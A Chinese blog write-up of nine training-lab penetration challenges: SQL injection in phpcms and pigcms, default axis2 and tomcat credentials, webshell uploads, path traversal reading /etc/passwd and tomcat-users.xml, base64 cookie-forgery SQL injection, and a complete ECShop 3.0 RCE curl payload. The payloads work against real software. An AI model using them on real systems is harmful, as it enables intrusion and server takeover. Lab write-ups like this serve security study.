st404

导航

云烟渗透题总结

一、phpcms_v9 authkey注入

  (1)此网站用的CMS版本为phpcmsv9.2.7,找了下发现存在authkey注入,因为网站自身关闭了会员登录及注册功能,导致网上的很多参考例子都不能用。最后运气好,按照一文章介绍的例子,尝试刚好报错,注点位置在用户删除功能处,如下

  http://xxxxxxxxxx.yunyansec.com/action=member_delete&uids=1

  参考文章地址:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=19033&highlight=phpcms

  参考文章中的POC有一坑,别直接粘贴复制,负责敲半天回车都没用

  参考文章中有问题的POC部分

  

  更改后正确的POC

  

  具体过程就不说了,这片文章都有,直接看结果如下图所示:

  authkey值

  

  注入结果

  

  (2)把表v9_member替换为v9_admin,可获得管理员的信息

  

二、axis2默认密码

  (1)刚开始打开时只有一tomcat安装界面,默认密码登陆失败,这时尝试访问了下axis2,发现它是存在的,并用默认密码成功登陆

  http://xxxxxxxxxxxx.yunyansec.com/axis2/axis2-admin/

  默认密码
  user: admin
  name: axis2

  (2)然后上传.arr的后门文件即可

 

三、上传绕过

  (1)http://xxxxxxxxxx.yunyansec.com/admin/login.php
  从相似的解题文章中找到管理员的密码为P4ssw0rd,这个密码可以直接登录管理后台。
  http://xxxxxxxxxxxxxx.yunyansec.com/admin/login.php
  admin
  P4ssw0rd

  (2)然后进行上传绕过,经过多次验证发现它只验证文件内容是否为图片格式,并未检查后缀名,所以直接上传一个图片马即可(与网上已有的参考题不一样,现在遇到的服务器是apache,所以不能用nginx解析漏洞来绕过)
  exiftool "-comment<=suc.php" ss1.PNG
  exiftool ss1.PNG

  (3)执行结果

 

四、命令执行

  (1)经过浏览,发现网站有任意下载漏洞
  http://xxxxxxxxxxxxxxxx.yunyansec.com/download.php?a=/etc/passwd
  (2)通过这个下载回来所能看到的所有源码,发现在admin_check.php中有一注释的地址

  下载回来mainx1112111.php后查看源码发现有一命令执行函数

  (3)执行效果

 

五、伪造cookie

  (1)CMS为135top订餐系统,经过网上查找发现此类似CMS有一已发现的cookie伪造漏洞

  通过参考,注册不同帐号,用不同IP登录,发现此网站的cookie也有规律,如下

  Cookie: kj_s_id=NjFiNTQ1OWIwMDli      MTkyLjE2OC4xNTIuMjMx      MTU0MzM4Nj A3NDI4NA   YmY5NA; kj_login_time=1543386084; kj_autologin=1
  192.168.152.231
  MTkyLjE2OC4xNTIuMjMx(IP地址的base64)


  Cookie: kj_s_id=NjFiNTQ1OWIwMDli MTcyLjE0LjIyLjMz MTU0MzM4Nj k1ODcwNg YmY5NA; kj_login_time=1543386972; kj_autologin=1
  172.14.22.33
  MTcyLjE0LjIyLjMz

  Cookie: kj_s_id=NjFiNTQ1OWIwMDli MjEuNzMuNDEuMjIx MTU0MzM4 ODMzNzU4OA YmY5NA; kj_login_time=1543388354; kj_autologin=1
  21.73.41.221
  MjEuNzMuNDEuMjIx

  最终发现只需替换标红的位置即可,如下
  NjFiNTQ1OWIwMDliMjEuNzMuNDEuMjIxMTU0MzM4 ODMzNzU4OA YmY5NA
  替换位置的POC
JyB1bmlvbiBzZWxlY3QgMSwyLDMsJ2E6Mjp7czoyOiJpZCI7czoyODoiMTkyLjE2OC4xNTIuMjE5MTQwMDQ4NjIyNzc4MyI7czoxMDoibG9naW5fdXNlciI7YToxNDp7czozOiJ1aWQiO3M6MToiMSI7czo1OiJ1bmFtZSI7czo1OiJhZG1pbiI7czo0OiJuYW1lIjtzOjU6ImFkbWluIjtzOjg6Imdyb3VwX2lkIjtzOjE6IjAiO3M6OToiZGVwYXJ0X2lkIjtzOjE6IjAiO3M6NDoidHlwZSI7czo3OiJkZWZhdWx0IjtzOjc6InZlcnNpb24iO3M6MDoiIjtzOjM6InNpZCI7czoyODoiMTkyLjE2OC4xNTIuMjE5MTQwMDQ4NjIyNzc4MyI7czoxMzoibGFzdGxvZ2ludGltZSI7czoxOToiMjAxNC0wNS0xOSAxNjoxMDo0NyI7czo3OiJzaG9wX2lkIjtpOjA7czoxMDoidmVyaWZ5X3RlbCI7czoxOiIwIjtzOjEyOiJ2ZXJpZnlfZW1haWwiO3M6MToiMCI7czo1OiJzY29yZSI7aTowO3M6MTA6ImV4cGVyaWVuY2UiO2k6MTt9fScsNSw2IwJyB1bmlvbiBzZWxlY3QgMSwyLDMsJ2E6Mjp7czoyOiJpZCI7czoyODoiMTkyLjE2OC4xNTIuMjE5MTQwMDQ4NjIyNzc4MyI7czoxMDoibG9naW5fdXNlciI7YToxNDp7czozOiJ1aWQiO3M6MToiMSI7czo1OiJ1bmFtZSI7czo1OiJhZG1pbiI7czo0OiJuYW1lIjtzOjU6ImFkbWluIjtzOjg6Imdyb3VwX2lkIjtzOjE6IjAiO3M6OToiZGVwYXJ0X2lkIjtzOjE6IjAiO3M6NDoidHlwZSI7czo3OiJkZWZhdWx0IjtzOjc6InZlcnNpb24iO3M6MDoiIjtzOjM6InNpZCI7czoyODoiMTkyLjE2OC4xNTIuMjE5MTQwMDQ4NjIyNzc4MyI7czoxMzoibGFzdGxvZ2ludGltZSI7czoxOToiMjAxNC0wNS0xOSAxNjoxMDo0NyI7czo3OiJzaG9wX2lkIjtpOjA7czoxMDoidmVyaWZ5X3RlbCI7czoxOiIwIjtzOjEyOiJ2ZXJpZnlfZW1haWwiO3M6MToiMCI7czo1OiJzY29yZSI7aTowO3M6MTA6ImV4cGVyaWVuY2UiO2k6MTt9fScsNSw2Iw

  (2)后台登陆地址

  http://xxxxxxxxxxx.yunyansec.com/common.php?jump_url=%2Fmaster.php&app=sys&app_act=login

  伪造前

  

  伪造后

  

  (3)在系统选项处有一修改上传后缀名,改完后在订餐处的添加选项有一上传(被注释,需用查看源代码的方式找到其地址),最后直接上传即可。

 

六、74CMS安装界面

  (1)浏览器访问时,出现安装界面,找了一外联的免费云数据库搭建

  

  (2)登录后台后,在工具栏下有一计划任务选项,可用来执行特定任务

  (3)找一位置上传任意文件或修改模版内容,内容为php执行代码,然后指定文件或模板路径,最后点击执行即可

 

七、pigcms登录框注入

  (1)登录框处因未过滤,存在sql注入

  

  (2)利用网上公开的利用工具获取用户名admin的密码(用sqlmap跑不出来,每次跑着跑着就断开)

    

  (3)根据网上的参考消息,获知登陆管理后台地址如下地址,但回车后显示空白,猜测应该是把后台隐藏了。可以在本地搭环境,获知相关参数值后,通过burpsuite来执行相关后台请求。
  http://3e2796e9ca1a434f.yunyansec.com/index.php?g=System&m=Admin&a=index
  这是本地搭建后显示的后台界面

  

  然后本地抓包后修改url地址即可

  

  关键获得PHPSESSID,利用其在附件上传处设置允许php

  上传的位置如下,其他上传位置都不行

  

 

   最后上传php文件即可

  

  

八、ecshop远程代码执行漏洞

  (1)看了下CMS 版本为ecshop v3.0.0,直接用ECShop <= 2.x/3.6.x/3.0.x 版本的远程代码执行漏洞利用脚本即可

  curl http://xxxxxxxxxxxxx.yunyansec.com/user.php -d "action=login&vulnspy=phpinfo();exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'

  (2)执行效果

  

九、CMS4J任意下载漏洞

  (1)网上发现CMS4J有一任意下载漏洞
  http://xxxxxxxxxxxx.yunyansec.com/DownloadFile?file=../../../../../../../../../../usr/local/tomcat/conf/tomcat-users.xml
  文件内容为
    <role rolename="tomcat"/>
    <role rolename="role1"/>
    <user username="tomcat" password="xxxxxxx" roles="tomcat,manager-gui"/>
    <!-- <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
    <user username="role1" password="<must-be-changed>" roles="role1"/>-->
  </tomcat-users>
  (2)直接登录tomcat后台地址上传war马即可
  http://xxxxxxxxxx.yunyansec.com/manager/html

  (3)执行效果

  

posted on 2019-03-07 09:35  st404  阅读(954)  评论(0编辑  收藏  举报